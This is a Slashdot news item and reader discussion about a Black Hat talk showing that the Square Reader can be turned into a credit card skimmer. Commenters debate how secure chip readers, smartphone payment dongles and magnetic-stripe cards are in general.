At Black Hat: Square Reader To Credit Card Skimmer In 10 Minutes

New submitter arit writes with word that three recent Boston University grads have demonstrated at Black Hat software and hardware attacks on the Square Reader used by many mobile vendors to process credit card transactions. One of the attacks converts a standard reader into an efficient credit card skimmer (conference slides) with very little effort. Always keep Scott Adams' object lesson in mind.

Card Readers are Card Skimmers

We have card readers attached to our pay-for-print release stations. Turns out if you open Notepad on the release station, the card reader instantly becomes a card skimmer, because, well, card readers read cards.

Re:Card Readers are Card Skimmers

[taustin]

I would be more interested in a comparison to chip-based readers: is it possible to build a chip-based skimmer?

Highly variable technology, at this point. Generally speaking, yeah, it could be done (though I suspect it'd be harder). The newest toy is a system the encrypts everything on the reader (or maybe on the card), and the merchant never sees the card info at all, so there's nothing to steal. Merchant services are pushing this hard, but it'll take a decade to get it fully deployed, even with the carrot of not having to be PCI compliant any more.

Black Hat for Noobs now?

[Lumpy]

The square reader to skimmer trick has been around for YEARS. Cripes all you had to do was record the audio and send the audio files to your skimmer.

Pretty sad that Black Hat has turned into a n00b conference. Was there also a talk on how you can use keyloggers?

Honestly, is anybody surprised?

[gstoddart]

Did anybody expect us to believe something you plugged into a cell phone speaker jack was actually secure in any sense of the word?

Here's a good rule of thumb: if it's a piece of consumer electronics, or involves your phone ... it's probably got terrible security.

The first time I saw a commercial for that I pretty much said "yeah, I would not trust a vendor who uses one of those".

The damned thing is almost guaranteed to be something which can be exploited. Sadly, just like every other piece of consumer electronics which tries to add network connectivity.

Companies don't care about, don't know about, and aren't accountable for security. Stop trusting that they do.

Re:Honestly, is anybody surprised?

[Yosho]

The first time I saw a commercial for that I pretty much said "yeah, I would not trust a vendor who uses one of those".

What makes them less trustworthy than any other credit card reader?

Re:Honestly, is anybody surprised?

[gstoddart]

The addition of a smartphone, the use of a headphone jack, and the intention to make it simple to use for small businesses.

Which means you should just start out assuming that it has, like every piece of consumer technology these days, absolutely terrible security .. if any at all.

Every damned week we see yet another piece of consumer tech which has almost zero security. Assuming this is true should be your default position.

What kind of bubble have you lived in that with a Slashdot id that low you still put any faith in this crap? Because weekly for the last decade or so is evidence to the contrary.

An app and a headphone jack simply can't graft security onto a smartphone.

Re:Honestly, is anybody surprised?

[cyberchondriac]

I have to back this up. In June, I used a Paypal debit card for a small vendor at a Ren Faire who used one of these, (I rarely ever used this card) and a month later, I got billed $567 at some Japanese hotel. The dispute is ongoing, though I jumped on it immediately, got the card disabled and a credit; still, that money was out of my checking account for a few days. Now, it could've been a dishonest vendor, or an employee, malware on her phone, or something else, I don't know, -even a different transaction possibly- but it seems beyond coincidence as I rarely use that card and hadn't used it for months and months prior, and had never used it with a card reader before and never had an issue before.

Re:Honestly, is anybody surprised?

[Kidbro]

I may be wrong, but I don't think GP is asking you why you think the device in question isn't secure. I think GP is asking you why you think other devices are.

Re:Honestly, is anybody surprised?

[Yosho]

What kind of bubble have you lived in that with a Slashdot id that low you still put any faith in this crap?

As Kidpro pointed out, you're making an incorrect assumption. I don't think smartphone credit card readers are secure. I think that all of the other types of card readers are insecure, too. There have been many cases of them being compromised.

It's news to me

[hey!]

... that anyone would expect this to be particularly hard to do. After all you're just reading bits off a magnetic stripe.

Vendors like to talk as if the security of a system is determined by the toughest component in the system, because then they can simply buy some whiz-bang encryption chip, slap it in their product, and claim their product is nigh unbreakable by ordinary mortals. But the truth is the security of a system is determined by its *weakest* component, and in this case that starts with the card itself. Trying to secure that is like trying to secure your butter by nailing it to the butter dish.